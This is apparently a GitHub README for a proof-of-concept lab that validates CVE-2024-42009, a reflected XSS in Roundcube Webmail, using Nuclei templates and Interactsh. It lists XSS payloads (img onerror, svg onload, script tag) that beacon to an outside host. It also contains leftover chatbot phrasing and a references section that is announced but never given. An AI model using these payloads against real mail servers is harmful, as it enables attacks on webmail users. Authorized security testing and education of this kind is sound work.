
Nuclei templates and Docker lab to demonstrate and validate CVE-2024-42009, a reflected XSS in Roundcube Webmail, using Out-of-Band detection via Interactsh for authorized testing.
This repository contains a Nuclei template and supporting resources to safely demonstrate and validate CVE-2024-42009, a critical reflected XSS vulnerability in Roundcube Webmail. The flaw resides in the message_body() function in show.php, where post-sanitization modifications lead to desanitization and unsafe rendering of crafted HTML email content.
⚠️ This PoC is intended for educational and authorized testing only. Do not use against systems you do not own or have explicit permission to test.
message_body() in show.phpThis repo uses Out-of-Band (OOB) detection via Interactsh to confirm JavaScript execution in a controlled lab.
<body> tag containing onanimationstart and a beacon to InteractshUse the provided Docker Compose file to spin up a local Roundcube instance with MailHog (SMTP sink) and MariaDB.
git clone https://github.com/Shubhankargupta691/CVE-2024-42009.git
cd CVE-2024-42009
docker compose up -d
http://localhost:8080http://localhost:8025⚠️ Do not use your Google Account.
CVE-2024-42009-OOB.yaml – Nuclei template with Interactsh and Out-of-Band (OOB) detectionCVE-2024-42009.yaml – Nuclei template without Interactsh and OOBdocker-compose.yml – Lab environment setup for Roundcube WebmailImages/ – Screenshots showing HTTP/DNS hits from InteractshThis video walks through the full exploit chain:
To responsibly include those XSS payloads in your README, you’ll want to place them in a section clearly labeled for educational or testing purposes. Here's a suggested structure:
⚠️ Disclaimer: These payloads are intended for educational use and authorized security testing only. Do not deploy them on systems without explicit permission.
<!-- Image tag with onerror -->
<img src="https://interact.sh/xss-test" onerror="fetch('https://interact.sh/hit')">
<!-- Broken image source with onerror -->
<img src="https://raw.githubusercontent.com/shubhankargupta691/cve-2024-42009/main/x" onerror="fetch('https://interact.sh/hit')">
<!-- SVG with onload -->
<svg onload="fetch('https://interact.sh/hit')"></svg>
<!-- Script tag -->
<script>fetch('https://interact.sh/hit')</script>
<!-- JavaScript in iframe src -->
https://interact.sh/hit with your own listener endpoint.Upgrade Roundcube to:
Perfect — here’s a clean and professional References section you can include in your README or email submission for CVE-2024-42009. It cites all the sources you've listed, formatted for clarity and credibility: